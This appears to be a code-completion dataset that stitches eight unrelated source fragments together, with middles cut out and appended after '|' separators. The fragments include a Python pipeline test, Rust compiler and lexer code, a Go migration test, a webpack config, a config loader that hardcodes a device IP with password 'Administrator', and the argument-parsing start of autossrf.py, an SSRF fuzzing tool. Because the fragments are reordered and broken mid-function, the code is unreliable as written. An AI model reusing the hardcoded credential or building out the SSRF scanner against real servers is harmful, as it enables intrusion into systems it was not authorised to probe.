feed_url = sp.check_output(['caw', 'upload', '--pipeline', 'Example branching pipeline', '--', f.name],
text=True).rstrip('\n')
self.assertTrue(feed_url.startswith(address),
msg='Feed URL was not correctly printed after `caw upload`')
self.assertTrue(feed_url.endswith('/'),
msg='Feed URL was not correctly printed after `caw upload`')
feed_data = poll_feed(feed_url, jobs_count=9)
with TemporaryDirectory() as tmpdir:
sp.run(['caw', 'download', feed_data['files'], tmpdir])
# the pipeline runs pl-dircopy --prefix L where L is a letter.
# if the DAG is constructed properly, it should produce the following prefixes
prefixes = {'', 'a', 'ba', 'ca', 'dba', 'eca', 'fca', 'gca', 'hgca'}
suffix = os.path.basename(f.name)
results = [
# example:
# '/tmp/folder/caw_test_SzvEhj/feed_10/pl-dircopy_81/pl-simpledsapp_82/pl-simpledsapp_83/pl-simpledsapp_85/data/fcatmpl_hy4m5o.txt'
# --> 'fca'
os.path.basename(fname[:-len(suffix)])
for fname in iglob(os.path.join(tmpdir, '**', '*' + suffix), recursive=True)
]
self.assertEqual(len(results), 9, msg='Incorrect number of files produced by feed.')
self.assertSetEqual(prefixes, set(results),
msg='DAG not reconstructed in the correct order.')
sp.run(['caw', 'logout']) |
shell.rs | use crate::app::InvokeResponse;
use serde::Deserialize;
/// The API descriptor.
#[derive(Deserialize)]
#[serde(tag = "cmd", rename_all = "camelCase")]
pub enum Cmd {
/// The execute script API.
Execute { command: String, args: Vec<String> },
/// The open URL in browser API
Open { uri: String },
}
impl Cmd {
pub async fn run(self) -> crate::Result<InvokeResponse> {
match self {
Self::Execute {
command: _,
args: _,
} => {
#[cfg(execute)]
{
//TODO
Ok(().into())
}
#[cfg(not(execute))]
Err(crate::Error::ApiNotAllowlisted("execute".to_string()))
}
Self::Open { uri } => {
#[cfg(open)]
{
open_browser(uri);
Ok(().into())
}
#[cfg(not(open))]
Err(crate::Error::ApiNotAllowlisted("open".to_string()))
}
}
}
}
#[cfg(open)]
pub fn | (uri: String) {
#[cfg(test)]
assert!(uri.contains("http://"));
#[cfg(not(test))]
webbrowser::open(&uri).expect("Failed to open webbrowser with uri");
}
#[cfg(test)]
mod test {
use proptest::prelude::*;
// Test the open func to see if proper uris can be opened by the browser.
proptest! {
#[cfg(open)]
#[test]
fn check_open(uri in r"(http://)([\\w\\d\\.]+([\\w]{2,6})?)") {
super::open_browser(uri);
}
}
}
| open_browser |
lang_items.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Detecting language items.
//
// Language items are items that represent concepts intrinsic to the language
// itself. Examples are:
//
// * Traits that specify "kinds"; e.g. "Sync", "Send".
//
// * Traits that represent operators; e.g. "Add", "Sub", "Index".
//
// * Functions called by the compiler itself.
pub use self::LangItem::*;
use session::Session;
use metadata::csearch::each_lang_item;
use middle::ty;
use middle::weak_lang_items;
use util::nodemap::FnvHashMap;
use syntax::ast;
use syntax::ast_util::local_def;
use syntax::attr::AttrMetaMethods;
use syntax::codemap::{DUMMY_SP, Span};
use syntax::parse::token::InternedString;
use syntax::visit::Visitor;
use syntax::visit;
use std::iter::Enumerate;
use std::slice;
// The actual lang items defined come at the end of this file in one handy table.
// So you probably just want to nip down to the end.
macro_rules! lets_do_this {
(
$( $variant:ident, $name:expr, $method:ident; )*
) => {
enum_from_u32! {
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
pub enum LangItem {
$($variant,)*
}
}
pub struct LanguageItems {
pub items: Vec<Option<ast::DefId>>,
pub missing: Vec<LangItem>,
}
impl LanguageItems {
pub fn new() -> LanguageItems {
fn foo(_: LangItem) -> Option<ast::DefId> { None }
LanguageItems {
items: vec!($(foo($variant)),*),
missing: Vec::new(),
}
}
pub fn items<'a>(&'a self) -> Enumerate<slice::Iter<'a, Option<ast::DefId>>> {
self.items.iter().enumerate()
}
pub fn item_name(index: usize) -> &'static str {
let item: Option<LangItem> = LangItem::from_u32(index as u32);
match item {
$( Some($variant) => $name, )*
None => "???"
}
}
pub fn require(&self, it: LangItem) -> Result<ast::DefId, String> {
match self.items[it as usize] {
Some(id) => Ok(id),
None => {
Err(format!("requires `{}` lang_item",
LanguageItems::item_name(it as usize)))
}
}
}
pub fn require_owned_box(&self) -> Result<ast::DefId, String> {
self.require(OwnedBoxLangItem)
}
pub fn from_builtin_kind(&self, bound: ty::BuiltinBound)
-> Result<ast::DefId, String>
{
match bound {
ty::BoundSend => self.require(SendTraitLangItem),
ty::BoundSized => self.require(SizedTraitLangItem),
ty::BoundCopy => self.require(CopyTraitLangItem),
ty::BoundSync => self.require(SyncTraitLangItem),
}
}
pub fn to_builtin_kind(&self, id: ast::DefId) -> Option<ty::BuiltinBound> {
if Some(id) == self.send_trait() {
Some(ty::BoundSend)
} else if Some(id) == self.sized_trait() {
Some(ty::BoundSized)
} else if Some(id) == self.copy_trait() {
Some(ty::BoundCopy)
} else if Some(id) == self.sync_trait() {
Some(ty::BoundSync)
} else {
None
}
}
pub fn fn_trait_kind(&self, id: ast::DefId) -> Option<ty::ClosureKind> {
let def_id_kinds = [
(self.fn_trait(), ty::FnClosureKind),
(self.fn_mut_trait(), ty::FnMutClosureKind),
(self.fn_once_trait(), ty::FnOnceClosureKind),
];
for &(opt_def_id, kind) in &def_id_kinds {
if Some(id) == opt_def_id {
return Some(kind);
}
}
None
}
$(
#[allow(dead_code)]
pub fn $method(&self) -> Option<ast::DefId> {
self.items[$variant as usize]
}
)*
}
struct LanguageItemCollector<'a> {
items: LanguageItems,
session: &'a Session,
item_refs: FnvHashMap<&'static str, usize>,
}
impl<'a, 'v> Visitor<'v> for LanguageItemCollector<'a> {
fn visit_item(&mut self, item: &ast::Item) {
if let Some(value) = extract(&item.attrs) {
let item_index = self.item_refs.get(&value[..]).cloned();
if let Some(item_index) = item_index {
self.collect_item(item_index, local_def(item.id), item.span)
}
}
visit::walk_item(self, item);
}
}
impl<'a> LanguageItemCollector<'a> {
pub fn new(session: &'a Session) -> LanguageItemCollector<'a> {
let mut item_refs = FnvHashMap();
$( item_refs.insert($name, $variant as usize); )*
LanguageItemCollector {
session: session,
items: LanguageItems::new(),
item_refs: item_refs
}
}
pub fn collect_item(&mut self, item_index: usize,
item_def_id: ast::DefId, span: Span) {
// Check for duplicates.
match self.items.items[item_index] {
Some(original_def_id) if original_def_id != item_def_id => {
span_err!(self.session, span, E0152,
"duplicate entry for `{}`", LanguageItems::item_name(item_index));
}
Some(_) | None => {
// OK.
}
}
// Matched.
self.items.items[item_index] = Some(item_def_id);
}
pub fn collect_local_language_items(&mut self, krate: &ast::Crate) {
visit::walk_crate(self, krate);
}
pub fn collect_external_language_items(&mut self) {
let crate_store = &self.session.cstore;
crate_store.iter_crate_data(|crate_number, _crate_metadata| {
each_lang_item(crate_store, crate_number, |node_id, item_index| {
let def_id = ast::DefId { krate: crate_number, node: node_id };
self.collect_item(item_index, def_id, DUMMY_SP);
true
});
})
}
pub fn collect(&mut self, krate: &ast::Crate) {
self.collect_local_language_items(krate);
self.collect_external_language_items();
}
}
pub fn extract(attrs: &[ast::Attribute]) -> Option<InternedString> {
for attribute in attrs {
match attribute.value_str() {
Some(ref value) if attribute.check_name("lang") => {
return Some(value.clone());
}
_ => {}
}
}
return None;
}
pub fn collect_language_items(krate: &ast::Crate,
session: &Session) -> LanguageItems {
let mut collector = LanguageItemCollector::new(session);
collector.collect(krate);
let LanguageItemCollector { mut items, .. } = collector;
weak_lang_items::check_crate(krate, session, &mut items);
session.abort_if_errors();
items
}
// End of the macro
}
}
lets_do_this! { | // Variant name, Name, Method name;
CharImplItem, "char", char_impl;
StrImplItem, "str", str_impl;
SliceImplItem, "slice", slice_impl;
ConstPtrImplItem, "const_ptr", const_ptr_impl;
MutPtrImplItem, "mut_ptr", mut_ptr_impl;
I8ImplItem, "i8", i8_impl;
I16ImplItem, "i16", i16_impl;
I32ImplItem, "i32", i32_impl;
I64ImplItem, "i64", i64_impl;
IsizeImplItem, "isize", isize_impl;
U8ImplItem, "u8", u8_impl;
U16ImplItem, "u16", u16_impl;
U32ImplItem, "u32", u32_impl;
U64ImplItem, "u64", u64_impl;
UsizeImplItem, "usize", usize_impl;
F32ImplItem, "f32", f32_impl;
F64ImplItem, "f64", f64_impl;
SendTraitLangItem, "send", send_trait;
SizedTraitLangItem, "sized", sized_trait;
UnsizeTraitLangItem, "unsize", unsize_trait;
CopyTraitLangItem, "copy", copy_trait;
SyncTraitLangItem, "sync", sync_trait;
DropTraitLangItem, "drop", drop_trait;
CoerceUnsizedTraitLangItem, "coerce_unsized", coerce_unsized_trait;
AddTraitLangItem, "add", add_trait;
SubTraitLangItem, "sub", sub_trait;
MulTraitLangItem, "mul", mul_trait;
DivTraitLangItem, "div", div_trait;
RemTraitLangItem, "rem", rem_trait;
NegTraitLangItem, "neg", neg_trait;
NotTraitLangItem, "not", not_trait;
BitXorTraitLangItem, "bitxor", bitxor_trait;
BitAndTraitLangItem, "bitand", bitand_trait;
BitOrTraitLangItem, "bitor", bitor_trait;
ShlTraitLangItem, "shl", shl_trait;
ShrTraitLangItem, "shr", shr_trait;
IndexTraitLangItem, "index", index_trait;
IndexMutTraitLangItem, "index_mut", index_mut_trait;
RangeStructLangItem, "range", range_struct;
RangeFromStructLangItem, "range_from", range_from_struct;
RangeToStructLangItem, "range_to", range_to_struct;
RangeFullStructLangItem, "range_full", range_full_struct;
UnsafeCellTypeLangItem, "unsafe_cell", unsafe_cell_type;
DerefTraitLangItem, "deref", deref_trait;
DerefMutTraitLangItem, "deref_mut", deref_mut_trait;
FnTraitLangItem, "fn", fn_trait;
FnMutTraitLangItem, "fn_mut", fn_mut_trait;
FnOnceTraitLangItem, "fn_once", fn_once_trait;
EqTraitLangItem, "eq", eq_trait;
OrdTraitLangItem, "ord", ord_trait;
StrEqFnLangItem, "str_eq", str_eq_fn;
// A number of panic-related lang items. The `panic` item corresponds to
// divide-by-zero and various panic cases with `match`. The
// `panic_bounds_check` item is for indexing arrays.
//
// The `begin_unwind` lang item has a predefined symbol name and is sort of
// a "weak lang item" in the sense that a crate is not required to have it
// defined to use it, but a final product is required to define it
// somewhere. Additionally, there are restrictions on crates that use a weak
// lang item, but do not have it defined.
PanicFnLangItem, "panic", panic_fn;
PanicBoundsCheckFnLangItem, "panic_bounds_check", panic_bounds_check_fn;
PanicFmtLangItem, "panic_fmt", panic_fmt;
ExchangeMallocFnLangItem, "exchange_malloc", exchange_malloc_fn;
ExchangeFreeFnLangItem, "exchange_free", exchange_free_fn;
StrDupUniqFnLangItem, "strdup_uniq", strdup_uniq_fn;
StartFnLangItem, "start", start_fn;
EhPersonalityLangItem, "eh_personality", eh_personality;
EhPersonalityCatchLangItem, "eh_personality_catch", eh_personality_catch;
MSVCTryFilterLangItem, "msvc_try_filter", msvc_try_filter;
ExchangeHeapLangItem, "exchange_heap", exchange_heap;
OwnedBoxLangItem, "owned_box", owned_box;
PhantomDataItem, "phantom_data", phantom_data;
// Deprecated:
CovariantTypeItem, "covariant_type", covariant_type;
ContravariantTypeItem, "contravariant_type", contravariant_type;
InvariantTypeItem, "invariant_type", invariant_type;
CovariantLifetimeItem, "covariant_lifetime", covariant_lifetime;
ContravariantLifetimeItem, "contravariant_lifetime", contravariant_lifetime;
InvariantLifetimeItem, "invariant_lifetime", invariant_lifetime;
NoCopyItem, "no_copy_bound", no_copy_bound;
NonZeroItem, "non_zero", non_zero;
StackExhaustedLangItem, "stack_exhausted", stack_exhausted;
DebugTraitLangItem, "debug_trait", debug_trait;
} | |
configfile.py | #!/usr/bin/python
import os
import sys
import time
import six
if sys.version[0] == '2':
from ConfigParser import ConfigParser
from cStringIO import StringIO
elif sys.version[0] == '3':
from configparser import ConfigParser
from io import StringIO
from larch.utils import OrderedDict
conf_sects = {'general': {},
'xps':{'bools':('use_ftp',)},
'fast_positioners': {'ordered':True},
'slow_positioners': {'ordered':True},
'xrf': {},
'scan': {'ints': ('dimension',),
'floats':('start1','stop1', 'step1','time1',
'start2','stop2', 'step2')}}
__c = (('general', ('mapdb', 'struck', 'scaler', 'xmap', 'mono',
'fileplugin', 'basedir', 'scandir', 'envfile')),
('xps', ('host', 'user', 'passwd', 'group', 'positioners')),
('scan', ('filename', 'dimension', 'comments', 'pos1', 'start1', 'stop1',
'step1', 'time1', 'pos2', 'start2', 'stop2', 'step2')),
('xrf', ('use', 'type', 'prefix', 'plugin')),
('fast_positioners', None),
('slow_positioners', None))
conf_objs = OrderedDict(__c)
conf_files = ('MapDefault.ini',
'//cars5/Data/xas_user/config/FastMap/Default.ini')
##struck = 13IDC:str:
##scaler = 13IDC:scaler2
default_conf = """# FastMap configuration file (default)
[general]
mapdb = 13XRM:map:
mono = 13IDA:
struck = 13IDE:SIS1
scaler = 13IDE:scaler1
xmap = dxpMercury:
fileplugin = netCDF1:
basedir = //cars5/Data/xas_user/June2011/_Setup
scandir = Scan00001
envfile = //cars5/Data/xas_user/config/XRM_XMAP_PVS_IDE.DAT
[xps]
type = NewportXPS
mode = XYGroup
host = 164.54.160.180
user = Administrator
passwd = Administrator
group = FINE
positioners= X, Y
[scan]
filename = scan.001
dimension = 2
pos1 = 13XRM:m1
start1 = -1.0
stop1 = 1.0
step1 = 0.01
time1 = 20.0
pos2 = 13XRM:m2
start2 = -1.0
stop2 = 1.0
step2 = 0.01
[fast_positioners]
1 = 13XRM:m1 | X
2 = 13XRM:m2 | Y
[slow_positioners]
1 = 13XRM:m1 | X
2 = 13XRM:m2 | Y
3 = 13XRM:m3 | Theta
4 = 13XRM:pm1 | Stage Z (focus)
5 = 13XRM:pm2 | Stage X
6 = 13XRM:m6 | Stage Y (vert)
"""
class FastMapConfig(object):
def __init__(self,filename=None,conftext=None):
self.config = {}
self.cp = ConfigParser()
conf_found = False
if filename is not None:
self.Read(fname=filename)
else:
for fname in conf_files:
if os.path.exists(fname) and os.path.isfile(fname):
self.Read(fname)
conf_found = True
break
if not conf_found:
self.cp.readfp(StringIO(default_conf))
self._process_data()
def Read(self,fname=None):
if fname is not None:
ret = self.cp.read(fname)
if len(ret)==0:
time.sleep(0.5)
ret = self.cp.read(fname)
self.filename = fname
self._process_data()
def _process_data(self):
for sect,opts in conf_sects.items():
# if sect == 'scan': print( opts)
if not self.cp.has_section(sect):
continue
bools = opts.get('bools',[])
floats= opts.get('floats',[])
ints = opts.get('ints',[])
thissect = {}
is_ordered = False
if 'ordered' in opts:
|
for opt in self.cp.options(sect):
get = self.cp.get
if opt in bools: get = self.cp.getboolean
elif opt in floats: get = self.cp.getfloat
elif opt in ints: get = self.cp.getint
val = get(sect,opt)
if is_ordered and '|' in val:
opt,val = val.split('|',1)
opt = opt.strip()
val = val.strip()
thissect[opt] = val
self.config[sect] = thissect
def Save(self,fname):
o = []
cnf = self.config
self.filename = fname
o.append('# FastMap configuration file (saved: %s)' % (time.ctime()))
for sect,optlist in conf_objs.items():
o.append('#------------------#\n[%s]'%sect)
if optlist is not None:
for opt in optlist:
try:
val = cnf[sect].get(opt,'<unknown>')
if not isinstance(val, six.string_types):
val = str(val)
o.append("%s = %s" % (opt,val))
except:
pass
else:
for i,x in enumerate(cnf[sect]):
o.append("%i = %s | %s" % (i+1,x,
cnf[sect].get(x,'<unknown>')))
o.append('#------------------#\n')
f = open(fname,'w')
f.write('\n'.join(o))
f.close()
def SaveScanParams(self,fname):
"save only scan parameters to a file"
o = []
o.append('# FastMap Scan Parameter file (saved: %s)' % (time.ctime()))
sect = 'scan'
optlist = conf_objs[sect]
o.append('#------------------#\n[%s]'%sect)
scan =self.config['scan']
for opt in optlist:
val = scan.get(opt,None)
if val is not None:
if not isinstance(val, six.string_types):
val = str(val)
o.append("%s = %s" % (opt,val))
o.append('#------------------#\n')
f = open(fname,'w')
f.write('\n'.join(o))
f.close()
def sections(self):
return self.config.keys()
def section(self, section):
return self.config[section]
def get(self, section, value=None):
if value is None:
return self.config[section]
else:
return self.config[section][value]
if __name__ == "__main__":
a = FastMapConfig()
a.Read('default.ini')
for k,v in a.config.items():
print( k,v, type(v))
a.Read('xmap.001.ini')
print( a.config['scan'])
a.SaveScanParams('xmap.002.ini')
| thissect = OrderedDict()
is_ordered = True |
kv_migrate_test.go | package actions_test
import (
"bytes"
"context"
"math/rand"
"os"
"strconv"
"testing"
"time"
"github.com/golang/mock/gomock"
"github.com/hashicorp/go-multierror"
"github.com/stretchr/testify/require"
"github.com/treeverse/lakefs/pkg/actions"
"github.com/treeverse/lakefs/pkg/actions/mock"
"github.com/treeverse/lakefs/pkg/db"
"github.com/treeverse/lakefs/pkg/kv"
"github.com/treeverse/lakefs/pkg/kv/kvtest"
"github.com/treeverse/lakefs/pkg/kv/postgres"
"github.com/treeverse/lakefs/pkg/testutil"
)
const (
migrateBenchRepo = "migrateBenchRepo"
migrateTestRepo = "migrateTestRepo"
actionsSampleSize = 10
)
func BenchmarkMigrate(b *testing.B) {
b.Run("Benchmark-250", func(b *testing.B) {
benchmarkMigrate(250, b)
})
b.Run("Benchmark-2500", func(b *testing.B) {
benchmarkMigrate(2500, b)
})
b.Run("Benchmark-25000", func(b *testing.B) {
benchmarkMigrate(25000, b)
})
}
// benchmarkMigrate - use this test to benchmark the migration time of actions. Default dataset size is small as to not
func benchmarkMigrate(runCount int, b *testing.B) {
ctx := context.Background()
database, _ := testutil.GetDB(b, databaseURI)
createMigrateTestData(b, ctx, database, migrateBenchRepo, runCount)
kvStore := kvtest.MakeStoreByName(postgres.DriverName, databaseURI)(b, ctx)
buf, _ := os.CreateTemp("", "migrate")
defer os.Remove(buf.Name())
defer buf.Close()
b.ResetTimer()
for n := 0; n < b.N; n++ {
err := actions.Migrate(ctx, database.Pool(), buf)
require.NoError(b, err)
_, _ = buf.Seek(0, 0)
testutil.MustDo(b, "Import file", kv.Import(ctx, buf, kvStore))
}
}
func TestMigrate(t *testing.T) {
var testData = make([][]actions.RunManifest, actionsSampleSize)
ctx := context.Background()
database, _ := testutil.GetDB(t, databaseURI)
ctrl := gomock.NewController(t)
testSource := mock.NewMockSource(ctrl)
testWriter := mock.NewMockOutputWriter(ctrl)
mockStatsCollector := NewActionStatsMockCollector()
for i := 0; i < actionsSampleSize; i++ {
testData[i] = createMigrateTestData(t, ctx, database, migrateTestRepo+strconv.Itoa(i), actionsSampleSize)
}
buf := bytes.Buffer{}
err := actions.Migrate(ctx, database.Pool(), &buf)
require.NoError(t, err)
kvStore := kvtest.MakeStoreByName(postgres.DriverName, databaseURI)(t, ctx)
mStore := kv.StoreMessage{Store: kvStore}
testutil.MustDo(t, "Import file", kv.Import(ctx, &buf, kvStore))
kvService := actions.NewService(ctx, actions.NewActionsKVStore(mStore), testSource, testWriter, &actions.DecreasingIDGenerator{}, &mockStatsCollector, true)
for i := 0; i < actionsSampleSize; i++ {
validateTestData(t, ctx, kvService, mStore, testData[i], migrateTestRepo+strconv.Itoa(i))
}
}
func validateTestData(t *testing.T, ctx context.Context, service actions.Service, store kv.StoreMessage, testData []actions.RunManifest, repoID string) {
runs, err := service.ListRunResults(ctx, repoID, "", "", "")
require.NoError(t, err)
defer runs.Close()
runCount := 0
for runs.Next() {
runCount++
run := runs.Value()
runIdx, err := strconv.Atoi(run.SourceRef)
// Check for secondary keys
if run.BranchID != "" {
secondary := kv.SecondaryIndex{}
rk := actions.RunByBranchPath(repoID, run.BranchID, run.RunID)
_, err = store.GetMsg(ctx, actions.PartitionKey, rk, &secondary)
require.NoError(t, err)
r := actions.RunResultData{}
_, err = store.GetMsg(ctx, actions.PartitionKey, string(secondary.PrimaryKey), &r)
require.NoError(t, err)
require.Equal(t, run, actions.RunResultFromProto(&r))
}
if run.CommitID != "" {
secondary := kv.SecondaryIndex{}
rk := actions.RunByCommitPath(repoID, run.CommitID, run.RunID)
_, err = store.GetMsg(ctx, actions.PartitionKey, rk, &secondary)
require.NoError(t, err)
r := actions.RunResultData{}
_, err = store.GetMsg(ctx, actions.PartitionKey, string(secondary.PrimaryKey), &r)
require.Equal(t, run, actions.RunResultFromProto(&r))
}
// Validate tasks
tasks, err := service.ListRunTaskResults(ctx, repoID, run.RunID, "")
require.NoError(t, err)
taskCount := 0
for i := 0; tasks.Next(); i++ {
taskCount++
task := tasks.Value()
taskIdx, err := strconv.Atoi(task.HookID)
require.NoError(t, err)
task.RunID = testData[runIdx].HooksRun[i].RunID
require.Equal(t, testData[runIdx].HooksRun[taskIdx], *task)
}
tasks.Close()
require.Equal(t, len(testData[runIdx].HooksRun), taskCount)
// Validate run data
run.RunID = testData[runIdx].Run.RunID
require.NoError(t, err)
expRun := testData[runIdx]
require.Equal(t, expRun.Run, *run)
}
require.Equal(t, len(testData), runCount)
}
func | (t testing.TB, ctx context.Context, database db.Database, repoID string, size int) []actions.RunManifest {
t.Helper()
rand.Seed(time.Now().UnixNano())
runs := make([]actions.RunManifest, 0)
runChan := make(chan *actions.RunManifest, 100)
var g multierror.Group
for i := 0; i < 10; i++ {
g.Go(func() error {
return writeToDB(ctx, runChan, repoID, database)
})
}
for i := 0; i < size; i++ {
iStr := strconv.Itoa(i)
now := time.Now().UTC().Truncate(time.Second)
runID := (&actions.IncreasingIDGenerator{}).NewRunID()
run := actions.RunManifest{
Run: actions.RunResult{
RunID: runID,
BranchID: "SomeBranch" + iStr,
SourceRef: iStr, // use this to identify old runID in KV format
EventType: "EventType" + iStr,
CommitID: "CommitID" + iStr,
StartTime: now,
EndTime: now.Add(1 * time.Hour).UTC().Truncate(time.Second),
Passed: rand.Intn(2) == 1,
},
HooksRun: make([]actions.TaskResult, 0),
}
for j := 0; j < 10; j++ {
jStr := strconv.Itoa(j)
now = time.Now().UTC().Truncate(time.Second)
h := actions.TaskResult{
RunID: run.Run.RunID,
HookRunID: actions.NewHookRunID(i, j),
HookID: jStr, // used to identify task when iterating over task results
ActionName: "Some_Action_" + jStr,
StartTime: now,
EndTime: now.Add(5 * time.Minute).UTC().Truncate(time.Second),
Passed: rand.Intn(2) == 1,
}
run.HooksRun = append(run.HooksRun, h)
}
runs = append(runs, run)
runChan <- &run
}
close(runChan)
testutil.MustDo(t, "Create entries", g.Wait().ErrorOrNil())
return runs
}
func writeToDB(ctx context.Context, jobChan <-chan *actions.RunManifest, repoID string, db db.Database) error {
for run := range jobChan {
_, err := db.Exec(ctx, `INSERT INTO actions_runs(repository_id, run_id, event_type, start_time, end_time, branch_id, source_ref, commit_id, passed)
VALUES ($1,$2,$3,$4,$5,$6,$7,$8,$9)`,
repoID, run.Run.RunID, run.Run.EventType, run.Run.StartTime, run.Run.EndTime, run.Run.BranchID, run.Run.SourceRef, run.Run.CommitID, run.Run.Passed)
if err != nil {
return err
}
for _, h := range run.HooksRun {
_, err = db.Exec(ctx, `INSERT INTO actions_run_hooks(repository_id, run_id, hook_run_id, action_name, hook_id, start_time, end_time, passed)
VALUES ($1,$2,$3,$4,$5,$6,$7,$8)`,
repoID, h.RunID, h.HookRunID, h.ActionName, h.HookID, h.StartTime, h.EndTime, h.Passed)
if err != nil {
return err
}
}
}
return nil
}
| createMigrateTestData |
scan.rs | use super::helpers::is_ident_start;
use super::{Lexer, Token, TokenType};
use calypso_ast::expr::Radix;
use calypso_base::streams::Stream;
use calypso_diagnostic::diagnostic::{EnsembleBuilder, LabelStyle};
use calypso_diagnostic::prelude::*;
impl<'lex> Lexer<'lex> {
/// Scan a single token.
///
/// # Errors
/// The errors returned by this function are of type [`CalError`].
/// When the error is of type [`DiagnosticError::Diagnostic`], it's
/// an error that was impossible to recover from.
///
/// # Panics
///
/// This function should not panic.
#[allow(clippy::too_many_lines)]
pub fn scan(&mut self) -> CalResult<Token<'lex>> |
}
| {
if let Some(wstok) = self.handle_whitespace()? {
return Ok(wstok);
}
self.current_to_start();
if self.is_at_end() {
return Ok(self.new_token(TokenType::Eof));
}
// We've already checked if we're at the end (which is when it gives none), so
// unwrapping should be safe here.
let span = self.next().unwrap();
let ch = span.value_owned();
// Is valid character for identifier's first character
if is_ident_start(&span) {
return Ok(self.handle_identifier());
} else if ch == '\'' {
return self.handle_char_literal();
} else if ch == '"' {
return self.handle_string_literal();
}
if ch == '0' {
if self.is_at_end() {
return Ok(self.new_token(TokenType::Int {
suffix: None,
radix: Radix::None,
}));
}
return Ok(self.handle_int_leading_zero());
} else if ch.is_ascii_digit() {
return Ok(self.handle_number());
}
let token_type = match ch {
'<' if self.next_if_eq(&'<').is_some() => {
if self.next_if_eq(&'=').is_some() {
unimplemented!() // TokenType::LtLtEq
} else {
TokenType::LtLt
}
}
'<' if self.next_if_eq(&'=').is_some() => TokenType::LtEq,
'<' => TokenType::Lt,
'>' if self.next_if_eq(&'>').is_some() => {
if self.next_if_eq(&'=').is_some() {
unimplemented!() // TokenType::GtGtEq
} else {
TokenType::GtGt
}
}
'>' if self.next_if_eq(&'=').is_some() => TokenType::GtEq,
'>' => TokenType::Gt,
'=' if self.next_if_eq(&'=').is_some() => TokenType::EqEq,
// '=' => TokenType::Eq,
'!' if self.next_if_eq(&'=').is_some() => TokenType::BangEq,
'!' => TokenType::Bang,
// '|' if self.next_if_eq(&'>').is_some() => TokenType::PipeGt,
'|' if self.next_if_eq(&'|').is_some() => TokenType::PipePipe,
// '|' if self.next_if_eq(&'=').is_some() => TokenType::PipeEq,
'|' => TokenType::Pipe,
'&' if self.next_if_eq(&'&').is_some() => TokenType::AndAnd,
// '&' if self.next_if_eq(&'=').is_some() => TokenType::AndEq,
'&' => TokenType::And,
// '+' if self.next_if_eq(&'=').is_some() => TokenType::PlusEq,
'+' => TokenType::Plus,
// '-' if self.next_if_eq(&'=').is_some() => TokenType::MinusEq,
// '-' if self.next_if_eq(&'>').is_some() => TokenType::Arrow,
'-' => TokenType::Minus,
'*' if self.next_if_eq(&'*').is_some() => {
if self.next_if_eq(&'=').is_some() {
unimplemented!() // TokenType::StarStarEq
} else {
TokenType::StarStar
}
}
// '*' if self.next_if_eq(&'=').is_some() => TokenType::StarEq,
'*' => TokenType::Star,
// '/' if self.next_if_eq(&'=').is_some() => TokenType::SlashEq,
'/' => TokenType::Slash,
// '%' if self.next_if_eq(&'=').is_some() => TokenType::PercentEq,
'%' => TokenType::Percent,
// '^' if self.next_if_eq(&'=').is_some() => TokenType::CaretEq,
'^' => TokenType::Caret,
'(' => TokenType::LParen,
')' => TokenType::RParen,
// '{' => TokenType::LBrace,
// '}' => TokenType::RBrace,
// '[' => TokenType::LBracket,
// ']' => TokenType::RBracket,
// ',' => TokenType::Comma,
// ';' => TokenType::Semi,
':' => TokenType::Colon,
// '.' if self.next_if_eq(&'.').is_some() => {
// if self.next_if_eq(&'=').is_some() {
// TokenType::DotDotEq
// } else {
// TokenType::DotDot
// }
// }
// '.' => TokenType::Dot,
// // `'_' => Under` is already taken care of by idents
// '#' if self.next_if_eq(&'!').is_some() => TokenType::HashBang,
// '#' => TokenType::Hash,
// Unexpected character
_ => {
self.gcx.grcx.write().report_syncd(
EnsembleBuilder::new()
.error(|b| {
b.code("E0003").short(err!(E0003)).label(
LabelStyle::Primary,
Some("didn't expect this character here"),
self.file_id,
self.new_span(),
)
})
.build(),
);
TokenType::Unexpected
}
};
Ok(self.new_token(token_type))
} |
webpack.config.js | module.exports = {
devtool:"eval-source-map",
| path: __dirname+"/js src",
filename: '[name].bundle.js',
//publicPath:"/....." 如果设置了,那么index.html里边引用的js就需要到这个文件夹下引用,如果没设,那么引用直接和index.html同一个文件夹
},
devServer:{
contentBase:__dirname,
inline:true
},
module: {
rules: [
{
test: /(\.jsx|\.js)$/,
use: {
loader: "babel-loader",
options: {
presets: [
"@babel/env", "@babel/react"
],
plugins:["@babel/plugin-proposal-class-properties"]
}
},
exclude: /node_modules/
},
{
test: /\.css$/,
use: [
{
loader: "style-loader"
}, {
loader: "css-loader",
options:{
modules:true,
localIdentName:"[name]__[local]--[hash:base64:5]"
}
}
]
}
]
}
} | entry: {
DateTimeSelector:'./js src/DateTimeSelector.js',
},
output: { |
autossrf.py | import regex
import argparse
import requests
import time
import os
import threading
import random
execPath = os.getcwd()
currentPath = os.path.dirname(__file__)
os.chdir(currentPath)
FUZZ_PLACE_HOLDER = '??????'
TIMEOUT_DELAY = 5
LOCK = threading.Lock()
parser = argparse.ArgumentParser()
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
args = parser.parse_args() |
if not (args.file or args.url):
parser.error('No input selected: Please add --file or --url as arguments.')
if not os.path.isdir('output'):
os.system("mkdir output")
if not os.path.isdir('output/threadsLogs'):
os.system("mkdir output/threadsLogs")
else:
os.system("rm -r output/threadsLogs")
os.system("mkdir output/threadsLogs")
if args.output:
outputFile = open(f"{execPath}/{args.output}", "a")
else:
outputFile = open("output/ssrf-result.txt", "a")
if args.file:
allURLs = [line.replace('\n', '') for line in open(f"{execPath}/{args.file}", "r")]
